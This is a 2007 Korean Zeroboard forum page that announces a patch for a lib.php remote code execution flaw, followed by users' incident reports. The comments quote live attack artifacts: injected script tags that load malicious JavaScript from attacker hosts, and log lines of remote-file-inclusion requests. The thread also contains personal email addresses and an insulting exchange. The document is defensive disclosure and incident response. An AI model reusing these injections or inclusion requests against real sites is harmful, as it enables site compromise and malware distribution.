제로보드4 다운로드

제로보드 4.0버젼의 프로그램 파일과 각종 패치파일들을 올리는 곳입니다.
제로보드4.0 버전의 경우 파일의 재배포는 무조건 금지합니다.
어떠한 경우라도 제로보드4를 자신의 자료실에 올리지 마십시요.
또한 제로보드4 버전은 원활한 기술지원이 어려운 상황입니다.
제로보드의 최신 버전인 제로보드XE에 대해 알아보시려면 여기를 클릭하세요

글수 67

제로보드4 원격 실행 보안 취약점 패치

http://www.zeroboard.com/15955761

2007.11.01 16:33:54 (*.8.16.209)

32204

1 / 0

Patch 4

안녕하세요.
최근 중국발 크래킹이 발생하고 있습니다.

크래킹을 하는 방법에 대해서 찾고 있던중 "갈릴레오"님의 도움으로 취약점 공격하는 것을 찾았습니다.

공격법은 lib.php에 $REMOTE_ADDR이라는 변수의 값을 data/now_connect.php 파일에 기록하는 것을 이용하여 $REMOTE_ADDR 변수에 대한 eval script코드를 삽입하여 원하는 command를 실행하는 것으로 파악했습니다.

일단 제로보드4를 기본으로 사용하시는 분은 첨부한 lib.php 파일을 덮어쓰시면 됩니다.

수정하고 계시는 분들은 다음과 같이 해주세요.

lib.php 파일을 에디터 등으로 연다
$REMOTE_ADDR 이라는 글자를 모두 $_SERVER['REMOTE_ADDR'] 로 변경
이 때 global $HTTP_SESSION_VARS, $member_table, $REMOTE_ADDR, $member, $connect; 이라는 부분에서는
global $HTTP_SESSION_VARS, $member_table, $member, $connect; 로 변경을 한다.

제로보드4의 경우 매우 오래전에 개발을 하였고 업그레이드가 원활치 않아서 다양한 부분에서 보안 취약점이 존재하고 있습니다.

많은 분들이 참여해서 만들어 주신 스킨등을 이용하기 위해서 제로보드4를 업그레이드할 수도 없어 제로보드XE라는 새로운 버전을 개발하게 되었던 것이구요.

최대한 빨리 제로보드XE의 안정성을 확보하고 데이터 이전을 완벽히 되도록 하여 보안 취약점으로 인한 불편을 최대한 줄여드릴 수 있도록 하겠습니다.

참고로 이런 보안 취약점의 경우 저에게 직접 리포팅이 되지 않는 경우가 있습니다.

개인 메일 주소를 자주 바꾸어서 그런 것 같은데 혹시 보안 취약점을 발견하셨을 경우 제 아이디로 쪽지(메일 발송 포함)로 알려주시면 감사하겠습니다.

이 게시물을..

lib.php (32.6KB)(2,654)

엮인글 주소 : http://www.zeroboard.com/15955761/b17/trackback

2007.11.01 18:05:13 (*.149.74.91)

지음아이

(추천수: 1 / 0)

드디어 나왔군요 ;ㅁ;

덕규님, 제로님 정말 감사합니다.

2007.11.01 18:10:10 (*.8.16.209)

아.. 죄송.. 덕규님이 아니라 갈릴레오님이시네요.. (__);;

2007.11.01 20:52:59 (*.34.162.159)

추고넷

패치 했습니다...^^

2007.11.01 20:56:18 (*.231.52.32)

허걱

이거 패치하니 홈피가 안뜨네요. 어케 된건지...알려주세요~~~~~~~~

2007.11.01 21:21:26 (*.104.32.3)

PayItForward™

global 변수에 $_SERVER['REMOTE_ADDR'] 라고 선언되면 안됩니다.
위에 나온 곳 말고 한군데가 더있습니다.
거길 찾아 지우시면 됩니다..

2007.11.01 22:11:49 (*.101.133.170)

item4

global $HTTP_SESSION_VARS, $member_table, $member, $connect;

에서 $HTTP_SESSION_VARS도 사실 빠져도 상관 없다고 생각합니다. 슈퍼전역변수니까요.

global $member_table, $member, $connect;

2007.12.29 11:02:14 (*.145.196.253)

skh

그럼에도 불구하고 $HTTP_SESSION_VARS 는 꼭 있어야 합니다!
특히 단독 서버 호스팅을 받는 경우엔 꼭 있어야 합니다.
이거 빼면 아예 로그인이 되지 않는 문제가 생깁니다.

2007.11.01 22:33:49 (*.41.240.128)

php,cgi어렵네

수고 하셨습니다
감사합니다~

2007.11.01 22:57:14 (*.163.249.17)

책사마

감사합니다

2007.11.02 01:53:49 (*.92.35.134)

궁금이

제 홈피가 크랙 당했는지 어케 알 수 있나요? 이거 패치 안 하면 해커들이 제 서버에 root 계정으로 어떤 코드든 실행 할 수 있다는 건가요? 혹시 해킹 시도가 있었는지 어디서 보면 알 수 있나요?

2007.11.02 02:07:25 (*.41.240.128)

php,cgi어렵네

http://www.zeroboard.com/zb4_tip/15948934

http://www.zeroboard.com/comm_freeboard/15947259

2007.11.02 09:08:47 (*.43.72.3)

자쿠아

감사합니다~.^^

2007.11.02 20:15:17 (*.213.196.200)

이진수닷넷

감사합니다.

2007.11.03 02:01:22 (*.34.131.88)

김익명

패치해도 안되시는분 저말고 계신가요?

저의 증상은...

##링크로 가보지 마세요## <script src="http://218.38.28.116/i/i/comm.js"></script>

이런식으로 스크립트가 자꾸 심어집니다. 스크립트를 삭제해도 몇시간뒤면 또 심겨져있습니다.

아래 파일들에 심어집니다.
index.php
zb41/outlogin.php
zb41/lib.php

도움주실분 안계신가요?

2007.11.03 13:47:58 (*.107.122.49)

미니어스707

연락 주시기 바랍니다.
gnuhacker(@)gmail.com 입니다.
아니라면 hanirc.org #zbxe_dev 채널로 오셔도 됩니다.

2007.11.03 02:24:11 (*.39.131.46)

우리

올려주신 파일 받아 덮어씌웠더니 홈에 에러 메세지가 뜹니다. 완벽한 패치가 아닌듯 하니 빠른 시일내에 조치해 주셨으면 합니다.

2007.11.03 03:04:46 (*.254.137.249)

윤성구

아무런 도움이 못되네요...열심히 패치하였으나 또다시 bbs폴더의 _head.php파일의 하단에
<script language="javascript" type="text/javascript" src="icon/zboard.gif"></script>
이런식으로 입력이 됩니다. 수동으로 지웠지만,좀더 확실한 방법이 사이트를 내리는거 외에는 없나요....

2007.11.03 03:36:08 (*.38.205.164)

nbamania

패치를 해도 다시 뚫립니다.
소용이 없네요.
다시 확인 부탁드립니다. 제로님..

2007.11.03 10:59:51 (*.150.183.118)

음.. 3가지 경우가 있을 것 같습니다.

첫째로는 이미 뚫려서 해커가 여기 저기 백도어를 만들어 놓았을 수 있습니다.
이럴 경우 문제되는 것들을 모두 찾기 전에는 힘듭니다.

둘째로는 패치한 것 외의 보안 취약점이 또 있다는 것입니다.
보안 취약점을 파악을 해야 패치가 가능할텐데 여기 저기 찾아보아도 찾지를 못하겠습니다.

셋째로 웹호스팅 서비스를 받는다면 자신이 아닌 다른 계정의 사용자 제로보드로 침입하여 전체 계정에 문제점을 일으키는 경우일 수가 있습니다.

_head.php 파일에 임의의 코드를 집어넣을 수 있다는 것은 웹 권한으로는 불가능하기에 이미 계정의 보안이 뚫린것으로 보아야 할 것 같습니다. (_head.php는 기본적으로 nobody 권한으로 수정이 안됩니다)

취약점을 모두 막는다고 해도 첫째, 셋째의 원인이라면 계속 변조가 일어날 수 밖에 없습니다.

2007.11.03 13:49:07 (*.107.122.49)

미니어스707

제로님 이번건과 관련하여 분석한 자료가 하나 있습니다.

또한 현재 제로보드 취약점에 따른 피해를입으신분들에 대한 로그나 자료있으시면
분석하여, 해당 취약점을 막을수 있도록 도와드리겠습니다.

http://cafe.naver.com/security/192

2007.11.05 11:15:27 (*.62.42.224)

애바른

저같은경우,
_head.php
_foot.php 등..파일권한을 root 로 변경도 해보았습니다.

하지만 어떤 방식인지 모르겠으나, _head.php 가 webmaster권한으로 변경이 되고, 수정되었더라구요..
즉..윈만한 nobody, 퍼미션등으로 아무리 해봐야 뚫립니다..
root권한 파일까지 뚫이니..할말이 없습니다.. 상식적으로 이해가 안되어 답답할 따릅이랍니다..ㅠㅠ

2007.11.03 15:07:40 (*.34.131.88)

김익명

심각합니다. 도움주실분 안계신가요.

현재는 스크립트만 자동적으로 심겨지는것 뿐만이 아니라
저희사이트에 접속후 백버튼을 눌렀을경우엔 특정사이트로의 연결을 시도합니다.
백버튼을 누르면 현페이지에 머물러있으며 웹브라우저하단 주소라인에 ttp://218.38.28.116/i/i/ ~ 이러한 사이트의 주소가 뜹니다.

2007.11.03 16:36:19 (*.107.122.49)

미니어스707

동일한 MS06-014 취약점을 이용한 악성코드 배포네요 ..

2007.11.03 16:12:00 (*.157.208.85)

런사커

저또한 심각합니다.

스크립트가 자동적으로 심어집니다.
저 같은경우 _heda 그리고 ICON 폴더에 이미지가 심어지네요.

시간대는 주소 새벽 3~6시사이에 심어지구요.

2007.11.03 16:38:03 (*.107.122.49)

미니어스707

메신져 남겨주시면 연락 드리겠습니다.

2007.11.03 17:17:39 (*.38.205.164)

nbamania

쪽지로 드렸습니다만 저도 좀 부탁드립니다.
엠에센 gemstone1016@hotmail.com 입니다.

2007.11.03 16:59:23 (*.100.173.55)

윤미

미니어스님 네이트온 dong098@hanmail.net 사용하고있습니다 (__)
도와주세요~~~

2007.11.03 18:01:59 (*.107.122.49)

미니어스707

추가 하였습니다.

2007.11.03 19:13:43 (*.213.204.37)

선정이**

(추천수: -1 / 0)

웹로그를 분석해보니 아래와 같은 로그가 눈에 띕니다

//크래킹이 의심되는 로그
66.232.105.218 - - [01/Nov/2007:00:31:17 +0900] "GET //include/write.php?dir=http://www.free-auctions.net/csv/safe.txt??? HTTP/1.1" 403 3548 "-" "libwww-perl/5.808"
66.232.105.218 - - [01/Nov/2007:00:31:36 +0900] "GET /bbs//include/write.php?dir=http://www.free-auctions.net/csv/safe.txt??? HTTP/1.1" 403 3548 "-" "libwww-perl/5.808"
66.232.105.218 - - [01/Nov/2007:00:31:39 +0900] "GET //include/write.php?dir=http://www.free-auctions.net/csv/safe.txt??? HTTP/1.1" 403 3548 "-" "libwww-perl/5.808"

아시는 분 얘기 좀 해주세요...

2007.11.03 19:49:41 (*.107.122.49)

미니어스707

$dir 변수 취약점은.. 예전 취약점입니다. pl8 서는 해당되지 않습니다.

해당 파일이 변조 되었는지, 날짜및 해당 파일을 점검해보시기 바랍니다.

2007.11.03 20:06:07 (*.45.31.23)

PHP

(추천수: -1 / 0)

냅두세요 멍청이 라니깐요 자바스크립트로 PHP를 수정할수 있다고하는 놈인데요 뭘

2007.11.03 20:25:06 (*.109.59.82)

선정이**

(추천수: -1 / 0)

임마..니가 그렇게 PHP 잘알면 해결책을 내놓던지...
해결책도 못내는 넘이 주둥이만 살아가꼬는...

2007.11.03 20:39:55 (*.45.31.23)

PHP

(추천수: -1 / 0)

병신아 나는 제로보드 따위 안쓴다

2007.11.04 11:29:35 (*.121.226.63)

그럼

(추천수: -1 / 0)

병신아 그럼 여긴 왜 왔냐? ㅎㅎ

2007.11.03 19:25:41 (*.45.31.23)

미니커뮤니티

login_check.php 파일에도 $REMOTE_ADDR 변수 있습니다

2007.11.03 22:22:43 (*.107.122.49)

미니어스707

현재 몇몇분의 서버에 접속하여 확인하고있습니다.

gg_late/f95aa7e4d9087c60b321c08a397accc1.php
gg_late/temp.php

위와 같은 파일이 nobody권한으로 생겨있었으며,
이는 여러단계에 걸친 암호화로 되어있었고,
이를 풀어서 확인한 결과..
숙주 파일인것으로 확인되었습니다.
(숙주파일이란 해당파일에서 xxx.exe 나 xxx.dll 파일을 직접 생성시켜 2차감염을 돕고있는것을 말합니다.)

생각보다 피해가 심각할것 같구요.
해당 바이너리의 특징은 모게임업체의 계정 탈취용도로 보이며, 예전 NCsoft 의 계정 도용사례와 흡사합니다.

로그 분석중이며, 해당 게임업체에는 이와 같은 사실을 통보하였습니다.

2007.11.04 00:10:53 (*.203.41.101)

석이

저도 계속 뚫립니다.. 보안패치 다하고 회원 이미지 업로드까지 다 했는데;; 이것 때문에 미치겠습니다. ㅜ.ㅡ

2007.11.04 03:54:36 (*.78.140.240)

제가 제로보드4를 사용하고 있는데
제로님이 제로보드4에 관한 공지 올리셔서 깜짝 놀래서
얼른 그 글대로 지금 곧 패치하였답니다.
제가 여기 가끔 들여다보는 이유가
바로 패치해야만 하는...아주 중요한 공지글이 올라오면
반드시 읽고 그리해주어야 한다는걸 알기에...
그리고 lib.php 이 파일 하나만 올려주시고 덮어씌우라고만 하셨다면
제가 참 난감하였을꺼예요.
제가 제로보드 파일 수정한 곳이 많은데...소스가 워낙 복잡하여...
제가 어딜 어떻게 고쳤는지...시간 지나서 거의 잊어버렸고...
아무튼...제로님이 참 세심하게 배려해주셨네요.

수정하고 계시는 분들은 다음과 같이 해주세요.

lib.php 파일을 에디터 등으로 연다
$REMOTE_ADDR 이라는 글자를 모두 $_SERVER['REMOTE_ADDR'] 로 변경
이 때 global $HTTP_SESSION_VARS, $member_table, $REMOTE_ADDR, $member, $connect; 이라는 부분에서는
global $HTTP_SESSION_VARS, $member_table, $member, $connect; 로 변경을 한다

이렇게 말해주셨는데 정말 잘해주셨구요. 정말 고맙습니다.
갈릴레오님이란 분이 도움을 주셨다는데 정말 고마우신 분이시네요.
제로보드4를 사용하시는 다른 분들도 모두 고마움을 느끼실꺼라 생각합니다.
모두 수고하셨구요.
제로보드 사용하면서 문제가 계속 생기시는 분들...안타깝네요.
얼른 모든 문제가 잘 해결되시길 바라겠구요.
제로보드 패치 못하신 분들 얼른 패치하시고...
제로보드 사용하시는 모든 분들이 제로보드를 계속
아무 문제없이 잘 쓰시길 바라겠습니다.

2007.11.04 11:53:41 (*.7.174.203)

요술왕자568

좋은 정보 감사합니다.
그런데... lib.php를 위와 같이 패치한 다음 서버에 올리면 사이트 자체가 안 열립니다.
그냥 하얀 화면이 뜨네요 ㅠㅠ

2007.11.04 17:28:39 (*.213.160.150)

Warning: Unknown(): Your script possibly relies on a session side-effect which existed until PHP 4.2.3. Please be advised that the session extension does not consider global variables as a source of data, unless register_globals is enabled. You can disable this functionality and this warning by setting session.bug_compat_42 or session.bug_compat_warn to off, respectively. in Unknown on line 0
저 파일 덮어쓴 이후로 이런 글이 뜹니다만;;; ㅜㅜ 어째야되나요

2007.11.04 23:17:56 (*.107.122.49)

미니어스

lib.php 파일 수정하시면서
global 구문안페 $REMOTE_ADDR 도 같이 수정하셨다면 그런 오류가 발생할수도 있습니다.

global 안에는 $REMOTE_ADDR 자체를 삭제하셔도 됩니다.

2007.11.04 20:33:25 (*.50.173.182)

ㅋ

갈릴레오님 정말 감사한 분이군요.~
잘 사용하겠습니다.ㅋ~

2007.11.04 20:44:50 (*.177.215.141)

찬이s

제로님이 올리신 수정 파일 보니 638번째줄에.

global $setup $REMOTE_ADDR; 에서도 global $setup; 처럼 문구를 삭제 해야 하더군요.

global $HTTP_SESSION_VARS, $member_table, $REMOTE_ADDR, $member, $connect; 이부분에서만 그러는 건줄 알고

했다가. 오류....

2007.11.06 00:56:55 (*.111.235.205)

떠나는님

설마 하는 마음에 패치를 미루다가 지난 금요일 밤부터 중국발 크래킹 당한 것 같습니다.
플래쉬 테두리선을 없애려고 js 를 사용했는데 이후 홈피가 먹통이 되었습니다.
별짓을 다했죠.

<script language="javascript" src="http://korea.host6.hostment.info/flash.js" type="text/javascript"></script>

포기하고 소스 수정을 하다가 제가 만든 것과 순서가 뒤바뀐 것을 발견하였습니다.
<script language="javascript" type="text/javascript" src= 이후는 무심코 지워서 생각이 않나네요.></script> 를 삭제하였습니다.

이후 홈피가 빨리 열리네요.

kt 회선의 장애인줄만 알고 있다가 패치가 생각나면서 이곳 내용을 읽어보고 당한 것을 알았습니다.

떨뜨름해서 다시 한번 소스를 확인하는데

<head> 하단에
<script src="Scripts/AC_RunActiveContent.js" type="text/javascript"></script> 가 있네요.

이것은 제가 만든 것이 아닙니다.

그리고
Scripts 폴더 안에 AC_RunActiveContent.js 파일이 확인되는데 이 폴더와 파일도 어느날 모르게 생겼났네요.

오전까지만 해도 public_html 밖에만 있던 AC_RunActiveContent.js 파일이

오후에 보니 public_html 안에도 Scripts 폴더를 만들었네요.

http://korea.host6.hostment.info/Scripts/AC_RunActiveContent.js

지워야 하는건지 ...

뭔지 아시는 분 댓글 부탁드립니다.

2007.11.06 11:25:13 (*.234.2.121)

여민수

전 며칠전부터 갑자기 이런 오류가 발생하기 시작했습니다...
건드린건 없는데..이것도 보안쪽 관련된것일까요?...@.@..................

Warning: fread(): Length parameter must be greater than 0. in /home/zamini/html/bbs/lib.php on line 1009

왜이런것일까요?..ㅠㅠ

2007.11.06 14:04:12 (*.44.66.74)

유사너지아

http://www.zeroboard.com/846464 참고.

2007.11.22 22:14:57 (*.39.191.50)

FAQ

$REMOTE_ADDR; 는 슈퍼전역변수로 예약변수 아닌가여?? 그런데 이걸로 어떻게 해킹이 -_-??

2007.12.15 20:31:51 (*.6.141.149)

grimzzang

header('P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"');

@header('P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"');

lib.php
login_check.php

2008.03.24 12:19:32 (*.128.161.200)

사용자

감사 합니다. ㅜㅜ

글쓴이 비밀번호 이메일 주소 홈페이지 비밀

스타일 편집기
HTML 편집기
미리 보기

배경, 글자, 이미지, 인용문등에서 더블클릭을 하시면 상세한 컴포넌트 설정이 가능합니다
문단 나누기를 하시려면 ctrl-엔터를 누르시면 됩니다. (글 작성완료후 alt-S를 누르면 저장이 됩니다)
단축키 안내
- Un Do : Ctrl+Z
- Re Do : Ctrl+Y
- Bold : Ctrl+B
- Underline : Ctrl+U
- Italic : Ctrl+I
- Style Remover : Ctrl+D
- URL : Ctrl+L

문서 첨부 제한 : 0Byte/ 2.00MB
파일 제한 크기 : 2.00MB (허용 확장자 : *.*)

번호			날짜
공지	Patch 4 [수정] 제로보드4 원격 실행 보안 취약점 패치 #2 67		2007-11-07
공지	ZeroBoard 4 [12-18] 제로보드4 PL8 재배포. (UTF8 포함) 46		2007-12-17
	Patch 4 제로보드4 원격 실행 보안 취약점 패치 49		2007-11-01
	안녕하세요.최근 중국발 크래킹이 발생하고 있습니다.크래킹을 하는 방법에 대해서 찾고 있던중 "갈릴레오"님의 도움으로 취약점 공격하는 것을 찾았습니다.공격법은 lib.php에 $REMOTE_ADDR이라는 변수의 값을 data/now_connect.p...
64		ZeroBoard 4 큐브리드용 제로보드4 pl8 22